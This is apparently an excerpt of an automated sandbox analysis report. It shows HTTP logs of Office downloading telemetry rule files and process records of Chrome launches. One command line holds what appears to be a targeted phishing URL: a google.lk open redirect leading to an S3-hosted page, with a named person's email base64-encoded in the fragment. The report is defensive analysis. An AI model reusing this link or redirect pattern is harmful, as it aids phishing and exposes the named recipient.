                              2024-11-29 14:59:34 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:35 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:35 GMT
                              Content-Type: text/xml
                              Content-Length: 419
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                              ETag: "0x8DC582B9C710B28"
                              x-ms-request-id: 320a0aa9-e01e-003c-0635-41c70b000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145935Z-174f7845968psccphC1EWRuz9s000000107g00000000ep4c
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                              Session IDSource IPSource PortDestination IPDestination Port
                              69192.168.2.44981713.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:35 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:35 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:35 GMT
                              Content-Type: text/xml
                              Content-Length: 477
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                              ETag: "0x8DC582BA54DCC28"
                              x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145935Z-174f7845968glpgnhC1EWR7uec0000001080000000008t73
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:35 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:09:58:05
                              Start date:29/11/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:2
                              Start time:09:58:10
                              Start date:29/11/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2364,i,9223651156863003473,13971906786475264581,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:3
                              Start time:09:58:15
                              Start date:29/11/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ=="
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Disassembly

                              No disassembly